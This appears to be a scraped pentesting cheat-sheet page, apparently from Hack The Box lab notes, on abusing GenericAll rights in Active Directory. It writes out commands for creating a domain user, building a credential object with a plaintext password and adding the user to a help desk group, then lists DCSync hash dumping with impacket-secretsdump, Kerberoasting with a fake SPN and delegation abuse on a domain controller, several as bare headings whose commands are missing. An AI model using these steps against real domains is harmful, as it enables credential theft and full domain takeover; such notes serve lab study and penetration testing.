githubEdit

generic-all

Creating a new user and assign DCSync permission to it.

Create new user

net user hack password123 /add /domain

Create a secure string object

Using damundsen user (after abusing 'force change password' got damundsen user) #psobject

$SecPassword = ConvertTo-SecureString 'password123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb\hack', $SecPassword)

Adding user (dam) to the "help desk level 1" group

Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members 
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'hack' -Credential $Cred2 -Verbose

Check user added to the group

Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName

Allow a user to DCSync permission

Now dump hashes via impacket-secretsdump


GenericAll - Kerberoasting

Create a fake SPN

Kerberoasting with Rubeus


GenericAll - (over DC)

Create a fake computer object

Modify the DC's delegation settings

Get kerberos ticket

Login


Last updated